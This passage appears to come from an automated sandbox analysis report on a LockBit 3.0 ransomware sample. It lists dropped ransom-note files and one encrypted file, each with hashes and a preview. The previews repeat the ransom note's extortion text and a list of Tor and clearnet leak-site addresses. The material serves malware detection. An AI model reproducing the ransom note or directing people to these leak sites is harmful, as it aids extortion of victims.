Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\LocalState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\RoamingState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\Settings\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\Settings\settings.dat.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):8431
                Entropy (8bit):7.977004288754183
                Encrypted:false
                SSDEEP:192:ouQRE1ZPsxvqVJL46q6Ts4QgZjDPdyZAvt7r6vaIGNcEeKziWo:oPKfevU41ys4QgpDPdTvRIGN7erv
                MD5:18A7BD72ED3894744D56F543443C6827
                SHA1:5D07CD9546321BBC37B752DA71EF469C1D583A23
                SHA-256:5F55F9EF0BE163DE3BC13EE02D3462E4D315591B09E51EE38032AFC3C30AFC1C
                SHA-512:C22A8129E58698727054A6D76F61F4012FCE50358734F7EF2536473ED80B616FAD1097B37C77DFC7D7819A8EAA8D6B8BAA37F729A66F31A6BAB32E6DFF25BACE
                Malicious:false
                Preview:5........<.....?Y.zo.iA9.%.Gd..9.k...%$z. .I.^'.J....?.......J...Ep...P..`...[p_....w..&.d.`k..........3.-...le.Qw.K...>.lS1I8....~d+X....@..df.VX{.........._..vp.../e.8.......E..S.:.:..c;._a.......e(..E.b.....V.T....e....W.r....>..TI.H.u.+..(.A..q.t..B...|F..2.6.L.J.=.E....W....X..x1..n.y.+9......K..t.l......S;...j)....,....`......6....4.)...%..%.P.C.~.aW..i....5..OZ..R~...V.c=*...Jf..h$Ie..x.....av.".z.j.8......v...>..._.5..n...._&...._..N.*9.,.j...7....'s.x....D..U....F.E..)?...u....c...j{..W.W'..C...A...M.S'...;+.+..h.r....{...>D9.....~lm..h..*...c.....y..9.....ik.qb....gyp}.Pa[..%K...$]..p.....)Y..TYG)......$........=...(...Q....X.-H>y..c9..|.l.Q....yWF.f".+...'N'.9.>o.wb..-k..`.2.V.T..l.........#...|..J..T...*.;..........S.mR .k....j..X.p+.q[I.Q.&..,....bD..$..#..6..A.Lsb.....5....*....irEq.&H&y..gV.]`S...q.].....ml....^.\...1/..S.7Y$s.o.|..xJ...s.9%*M..E..-..JX....T.!..UQf......Hl:....g..fo..i..{W..v$.w.........tvD.....n.......}m......2...

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\SystemAppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\TempState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\AC\Temp\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\AC\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\AppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\LocalCache\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\LocalState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\RoamingState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\Settings\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
